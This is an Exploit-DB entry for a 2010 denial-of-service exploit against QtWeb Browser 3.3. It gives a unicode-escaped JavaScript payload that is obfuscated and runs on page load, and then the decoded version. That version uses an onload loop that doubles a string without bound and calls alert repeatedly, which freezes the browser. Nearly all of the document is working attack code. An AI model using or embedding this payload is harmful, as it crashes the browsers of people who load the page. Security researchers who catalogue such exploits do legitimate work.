QtWeb Browser 3.3 - Denial of Service

EDB-ID:

12655

CVE:

N/A

Author:

PoisonCode

Type:

dos

Platform:

Windows

Published:

2010-05-18

# Title: QtWeb Browser version 3.3 Dos based in Xss
# Software:http://www.qtweb.net/downloads/QtWeb-setup.exe
# Portable Software:http://www.qtweb.net/downloads/QtWeb.exe
# Version: 3.3
# Tested on: Windows
# Author: PoisonCode
# Published: 2010-05-17
# CVE-ID:()

_____   _____                      _ _         
|  __ \ / ____|                    (_) |        
| |__) | (___   ___  ___ _   _ _ __ _| |_ _   _ 
|  ___/ \___ \ / _ \/ __| | | | '__| | __| | | |
| |     ____) |  __/ (__| |_| | |  | | |_| |_| |
|_|    |_____/ \___|\___|\__,_|_|  |_|\__|\__, |
                                           __/ |
                                          |___/

PanamaSecurity.blogspot.com

Anti Lammer Enconde
                                                                                                                                                                     
<script type="text/javascript">document.write('\u003C\u0062\u006F\u0064\u0079\u0020\u006F\u006E\u006C\u006F\u0061\u0064\u003D\u0022\u006A\u0061\u0076\u0061\u0073\u0063\u0072\u0069\u0070\u0074\u003A\u0062\u006C\u006F\u0063\u006B\u0028\u0029\u003B\u0022\u003E\u003C\u002F\u0062\u006F\u0064\u0079\u003E\u000D\u0020\u000D\u003C\u0073\u0063\u0072\u0069\u0070\u0074\u003E\u000D\u0020\u000D\u0066\u0075\u006E\u0063\u0074\u0069\u006F\u006E\u0020\u0062\u006C\u006F\u0063\u006B\u0028\u0029\u0020\u007B\u000D\u0020\u000D\u0076\u0061\u0072\u0020\u0062\u0020\u003D\u0020\u0027\u005C\u0078\u0034\u0043\u005C\u0078\u0045\u0046\u005C\u0078\u0031\u0033\u005C\u0078\u0030\u0030\u0027\u003B\u000D\u0066\u006F\u0072\u0020\u0028\u0061\u0020\u003D\u0030\u003B\u0061\u003C\u0039\u0039\u0039\u0039\u0039\u0039\u0039\u0039\u0039\u0039\u0039\u003B\u0061\u002B\u002B\u0029\u0020\u007B\u000D\u0062\u002B\u003D\u0062\u002B\u0027\u005C\u0078\u0034\u0043\u005C\u0078\u0045\u0046\u005C\u0078\u0031\u0033\u005C\u0078\u0030\u0030\u0027\u003B\u000D\u0061\u006C\u0065\u0072\u0074\u0028\u0027\u003C\u0068\u0074\u006D\u006C\u003E\u003C\u006D\u0061\u0072\u0071\u0075\u0065\u0065\u003E\u003C\u0068\u0031\u003E\u0027\u002B\u0062\u002B\u0062\u0029\u003B\u000D\u000D\u007D\u000D\u0020\u000D\u007D\u000D\u0020\u000D\u003C\u002F\u0073\u0063\u0072\u0069\u0070\u0074\u003E\u000D\u000D');</script>

==================================================
Exploit-DB Notes - Decoded Version:
==================================================

<body onload="javascript:block();"></body>

<script>
function block() {
var b = '\x4C\xEF\x13\x00';
for (a =0;a<99999999999;a++) {
b+=b+'\x4C\xEF\x13\x00';
alert('<html><marquee><h1>'+b+b);
}
}
</script>